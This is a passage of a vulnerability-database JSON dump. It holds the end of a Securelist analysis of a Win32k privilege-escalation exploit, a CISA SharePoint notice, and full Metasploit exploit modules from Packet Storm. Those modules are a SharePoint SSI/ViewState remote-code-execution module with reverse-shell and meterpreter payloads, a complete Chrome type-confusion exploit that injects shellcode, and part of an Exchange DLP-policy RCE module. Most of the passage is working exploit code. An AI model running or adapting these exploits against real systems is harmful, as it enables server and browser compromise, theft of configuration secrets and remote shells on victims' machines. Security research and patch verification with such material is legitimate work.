0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) &amp; 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2020-12-18T18:06:53", "bulletinFamily": "info", "cvelist": ["CVE-2020-16952"], "description": "The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an [Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations >) to address a vulnerability\u2014CVE-2020-16952\u2014affecting Microsoft SharePoint server. An attacker could exploit this vulnerability to take control of an affected system. Applying patches from Microsoft\u2019s October 2020 Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) can prevent exploitation of this vulnerability.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the [NCSC Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) and the Microsoft Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability>); we'd welcome your feedback.\n", "modified": "2020-10-16T00:00:00", "published": "2020-10-16T00:00:00", "id": "CISA:48962A3B37B032DCF622B3E3135B8A1A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability", "type": "cisa", "title": "NCSC Releases Alert on Microsoft SharePoint Vulnerability", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-19T16:33:40", "description": "", "published": "2020-10-19T00:00:00", "type": "packetstorm", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "PACKETSTORM:159612", "href": "https://packetstormsecurity.com/files/159612/Microsoft-SharePoint-SSI-ViewState-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE', \n'Description' => %q{ \nThis module exploits a server-side include (SSI) in SharePoint to leak \nthe web.config file and forge a malicious ViewState with the extracted \nvalidation key. \n \nThis exploit is authenticated and requires a user with page creation \nprivileges, which is a standard permission in SharePoint. \n \nThe web.config file will be stored in loot once retrieved, and the \nVALIDATION_KEY option can be set to short-circuit the SSI and trigger \nthe ViewState deserialization. \n \nTested against SharePoint 2019 on Windows Server 2016. \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16952'], \n['URL', 'https://srcincite.io/advisories/src-2020-0022/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952'] \n], \n'DisclosureDate' => '2020-10-13', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'DotNetGadgetChain' => :TypeConfuseDelegate \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('VALIDATION_KEY', [false, 'ViewState validation key']), \n# \"Promote\" these advanced options so we don't have to pass around our own \nOptString.new('HttpUsername', [false, 'SharePoint username']), \nOptString.new('HttpPassword', [false, 'SharePoint password']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef vuln_builds \n[ \n[Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013 \n[Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016 \n[Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019 \n] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Hat tip @tsellers-r7 \n# \n# MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly \nunless (build_header = res.headers['MicrosoftSharePointTeamServices']) \nreturn CheckCode::Unknown('Target does not appear to be running SharePoint.') \nend \n \nunless (build = build_header.scan(/^([\\d.]+):/).flatten.first) \nreturn CheckCode::Detected('Target did not respond with SharePoint build.') \nend \n \nif vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\") \nend \n \ndef exploit \nunless username && password \nfail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation') \nend \n \nif (@validation_key = datastore['VALIDATION_KEY']) \nprint_status(\"Using ViewState validation key #{@validation_key}\") \nelse \ncreate_ssi_page \nleak_web_config \nend \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef create_ssi_page \nprint_status(\"Creating page for SSI: #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'PUT', \n'uri' => ssi_path, \n'data' => ssi_page \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless [200, 201].include?(res.code) \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\") \nend \n \nfail_with(Failure::NotFound, 'Failed to create page') \nend \n \nprint_good('Successfully created page') \n@page_created = true \nend \n \ndef leak_web_config \nprint_status('Leaking web.config') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => ssi_path, \n'headers' => { \nssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\") \nend \n \nunless (web_config = res.get_xml_document.at('//configuration')) \nfail_with(Failure::NotFound, 'Failed to extract web.config from response') \nend \n \nprint_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\") \n \nunless (@validation_key = extract_viewstate_validation_key(web_config)) \nfail_with(Failure::NotFound, 'Failed to extract ViewState validation key') \nend \n \nprint_good(\"ViewState validation key: #{@validation_key}\") \nensure \ndelete_ssi_page if @page_created \nend \n \ndef delete_ssi_page \nprint_status(\"Deleting #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'DELETE', \n'uri' => ssi_path, \n'partial' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 204 \nprint_warning('Failed to delete page') \nreturn \nend \n \nprint_good('Successfully deleted page') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'), \n'vars_post' => { \n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx \nalgo: 'sha256', \nkey: pack_viewstate_validation_key(@validation_key) \n) \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good('Successfully executed command') \nend \n \ndef ssi_page \n<<~XML \n<WebPartPages:DataFormWebPart runat=\"server\"> \n<ParameterBindings> \n<ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" /> \n</ParameterBindings> \n<xsl> \n<xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"> \n<xsl:param name=\"#{ssi_param}\" /> \n<xsl:template match=\"/\"> \n<xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" /> \n</xsl:template> \n</xsl:stylesheet> \n</xsl> \n</WebPartPages:DataFormWebPart> \nXML \nend \n \ndef ssi_path \n@ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\") \nend \n \ndef ssi_header \n@ssi_header ||= rand_text_alphanumeric(8..42) \nend \n \ndef ssi_param \n@ssi_param ||= rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/159612/sharepoint_ssi_viewstate.rb.txt"}, {"lastseen": "2020-03-06T22:52:32", "description": "", "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156640", "href": "https://packetstormsecurity.com/files/156640/Google-Chrome-67-68-69-Object.create-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit', \n'Description' => %q{ \nThis modules exploits a type confusion in Google Chromes JIT compiler. \nThe Object.create operation can be used to cause a type confusion between a \nPropertyArray and a NameDictionary. \nThe payload is executed within the rwx region of the sandboxed renderer \nprocess, so the browser must be run with the --no-sandbox option for the \npayload to work. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', # discovery and exploit \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2018-17463'], \n['URL', 'http://www.phrack.org/papers/jit_exploitation.html'], \n['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'], \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => ['windows', 'osx'], \n'DefaultTarget' => 0, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Sep 25 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \n \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] \" + request.body) \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \n \njscript = %Q^ \nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]); \n \nlet ab = new ArrayBuffer(8); \nlet floatView = new Float64Array(ab); \nlet uint64View = new BigUint64Array(ab); \nlet uint8View = new Uint8Array(ab); \n \nNumber.prototype.toBigInt = function toBigInt() { \nfloatView[0] = this; \nreturn uint64View[0]; \n}; \n \nBigInt.prototype.toNumber = function toNumber() { \nuint64View[0] = this; \nreturn floatView[0]; \n}; \n \nfunction hex(n) { \nreturn '0x' + n.toString(16); \n}; \n \nfunction fail(s) { \nprint('FAIL ' + s); \nthrow null; \n} \n \nconst NUM_PROPERTIES = 32; \nconst MAX_ITERATIONS = 100000; \n \nfunction gc() { \nfor (let i = 0; i < 200; i++) { \nnew ArrayBuffer(0x100000); \n} \n} \n \nfunction make(properties) { \nlet o = {inline: 42} // TODO \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \neval(`o.p${i} = properties[${i}];`); \n} \nreturn o; \n} \n \nfunction pwn() { \nfunction find_overlapping_properties() { \nlet propertyNames = []; \nfor (let i = 0; i < NUM_PROPERTIES; i++) { \npropertyNames[i] = `p${i}`; \n} \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \n${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')} \nreturn [${propertyNames.join(', ')}]; \n} \n`); \n \nlet propertyValues = []; \nfor (let i = 1; i < NUM_PROPERTIES; i++) { \npropertyValues[i] = -i; \n} \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \nlet r = vuln(make(propertyValues)); \nif (r[1] !== -1) { \nfor (let i = 1; i < r.length; i++) { \nif (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) { \nreturn [i, -r[i]]; \n} \n} \n} \n} \n \nfail(\"Failed to find overlapping properties\"); \n} \n \nfunction addrof(obj) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nreturn o.p${p1}.x1; \n} \n`); \n \nlet propertyValues = []; \npropertyValues[p1] = {x1: 13.37, x2: 13.38}; \npropertyValues[p2] = {y1: obj}; \n \nlet i = 0; \nfor (; i < MAX_ITERATIONS; i++) { \nlet res = vuln(make(propertyValues)); \nif (res !== 13.37) \nreturn res.toBigInt() \n} \n \nfail(\"Addrof failed\"); \n} \n \nfunction corrupt_arraybuffer(victim, newValue) { \neval(` \nfunction vuln(o) { \nlet a = o.inline; \nthis.Object.create(o); \nlet orig = o.p${p1}.x2; \no.p${p1}.x2 = ${newValue.toNumber()}; \nreturn orig; \n} \n`); \n \nlet propertyValues = []; \nlet o = {x1: 13.37, x2: 13.38}; \npropertyValues[p1] = o; \npropertyValues[p2] = victim; \n \nfor (let i = 0; i < MAX_ITERATIONS; i++) { \no.x2 = 13.38; \nlet r = vuln(make(propertyValues)); \nif (r !== 13.38) \nreturn r.toBigInt(); \n} \n \nfail(\"Corrupt ArrayBuffer failed\"); \n} \n \nlet [p1, p2] = find_overlapping_properties(); \nprint(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`); \n \nlet memview_buf = new ArrayBuffer(1024); \nlet driver_buf = new ArrayBuffer(1024); \n \ngc(); \n \nlet memview_buf_addr = addrof(memview_buf); \nmemview_buf_addr--; \nprint(`ArrayBuffer @ ${hex(memview_buf_addr)}`); \n \nlet original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr); \n \nlet driver = new BigUint64Array(driver_buf); \nlet original_memview_buf_ptr = driver[4]; \n \nlet memory = { \nwrite(addr, bytes) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nmemview.set(bytes); \n}, \nread(addr, len) { \ndriver[4] = addr; \nlet memview = new Uint8Array(memview_buf); \nreturn memview.subarray(0, len); \n}, \nreadPtr(addr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nreturn memview[0]; \n}, \nwritePtr(addr, ptr) { \ndriver[4] = addr; \nlet memview = new BigUint64Array(memview_buf); \nmemview[0] = ptr; \n}, \naddrof(obj) { \nmemview_buf.leakMe = obj; \nlet props = this.readPtr(memview_buf_addr + 8n); \nreturn this.readPtr(props + 15n) - 1n; \n}, \n}; \n \n// Generate a RWX region for the payload \nfunction get_wasm_instance() { \nvar buffer = new Uint8Array([ \n0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0, \n1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128, \n128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104, \n101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11 \n]); \nreturn new WebAssembly.Instance(new WebAssembly.Module(buffer),{}); \n} \n \nlet wasm_instance = get_wasm_instance(); \nlet wasm_addr = memory.addrof(wasm_instance); \nprint(\"wasm_addr @ \" + hex(wasm_addr)); \nlet wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n); \nprint(\"wasm_rwx @ \" + hex(wasm_rwx_addr)); \n \nmemory.write(wasm_rwx_addr, shellcode); \n \nlet fake_vtab = new ArrayBuffer(0x80); \nlet fake_vtab_u64 = new BigUint64Array(fake_vtab); \nlet fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n); \n \nlet div = document.createElement('div'); \nlet div_addr = memory.addrof(div); \nprint('div_addr @ ' + hex(div_addr)); \nlet el_addr = memory.readPtr(div_addr + 0x20n); \nprint('el_addr @ ' + hex(div_addr)); \n \nfake_vtab_u64.fill(wasm_rwx_addr, 6, 10); \nmemory.writePtr(el_addr, fake_vtab_addr); \n \nprint('Triggering...'); \n \n// Trigger virtual call \ndiv.dispatchEvent(new Event('click')); \n \n// We are done here, repair the corrupted array buffers \nlet addr = memory.addrof(driver_buf); \nmemory.writePtr(addr + 32n, original_driver_buf_ptr); \nmemory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr); \n} \n \npwn(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \n \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156640/chrome_object_create.rb.txt"}, {"lastseen": "2020-09-17T14:42:19", "description": "", "published": "2020-09-17T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-16875"], "modified": "2020-09-17T00:00:00", "id": "PACKETSTORM:159210", "href": "https://packetstormsecurity.com/files/159210/Microsoft-Exchange-Server-DlpUtils-AddTenantDlpPolicy-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE', \n'Description' => %q{ \nThis vulnerability allows remote attackers to execute arbitrary code \non affected installations of Exchange Server. Authentication is \nrequired to exploit this vulnerability. Additionally, the target user \nmust have the \"Data Loss Prevention\" role assigned and an active \nmailbox. \n \nIf the user is in the \"Compliance Management\" or greater \"Organization \nManagement\" role groups, then they have the \"Data Loss Prevention\" \nrole. Since the user who installed Exchange is in the \"Organization \nManagement\" role group, they transitively have the \"Data Loss \nPrevention\" role. \n \nThe specific flaw exists within the processing of the New-DlpPolicy \ncmdlet. The issue results from the lack of proper validation of \nuser-supplied template data when creating a DLP policy. An attacker \ncan leverage this vulnerability to execute code in the context of \nSYSTEM. \n \nTested against Exchange Server 2016 CU14 on Windows Server 2016. \n}, \n'Author' => [ \n'mr_me', # Discovery, exploits, and most of the words above \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16875'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875'], \n['URL', 'https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016'], \n['URL', 'https://srcincite.io/advisories/src-2020-0019/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16875.py.txt'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt'] \n], \n'DisclosureDate' => '2020-09-08', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Exchange Server 2016 and 2019 w/o KB4577352', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https', \n'HttpClientTimeout' => 5, \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nACCOUNT_LOCKOUTS, # Creates a concurrent OWA session \nCONFIG_CHANGES, # Creates a new DLP policy \nARTIFACTS_ON_DISK # Uses a DLP policy template file \n] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('USERNAME', [false, 'OWA username']), \nOptString.new('PASSWORD', [false, 'OWA password']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef password \ndatastore['PASSWORD'] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && res.body.include?('<title>Outlook</title>') \nreturn CheckCode::Unknown('Target does not appear to be running OWA.') \nend \n \nCheckCode::Detected(\"OWA is running at #{full_uri('/owa/')}\") \nend \n \ndef exploit \nowa_login \ncreate_dlp_policy(retrieve_viewstate) \nend \n \ndef owa_login \nunless username && password \nfail_with(Failure::BadConfig, 'USERNAME and PASSWORD are required for exploitation') \nend \n \nprint_status(\"Logging in to OWA with creds #{username}:#{password}\") \n \nres = send_request_cgi!({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/owa/auth.owa'), \n'vars_post' => { \n'username' => username, \n'password' => password, \n'flags' => '', \n'destination' => full_uri('/owa/', vhost_uri: true) \n}, \n'keep_cookies' => true \n}, datastore['HttpClientTimeout'], 2) # timeout and redirect_depth \n \nunless res \nfail_with(Failure::Unreachable, 'Failed to access OWA login page') \nend \n \nunless res.code == 200 && cookie_jar.grep(/^cadata/).any? \nif res.body.include?('There are too many active sessions connected to this mailbox.') \nfail_with(Failure::NoAccess, 'Reached active session limit for mailbox') \nend \n \nfail_with(Failure::NoAccess, 'Failed to log in to OWA with supplied creds') \nend \n \nif res.body.include?('Choose your preferred display language and home time zone below.') 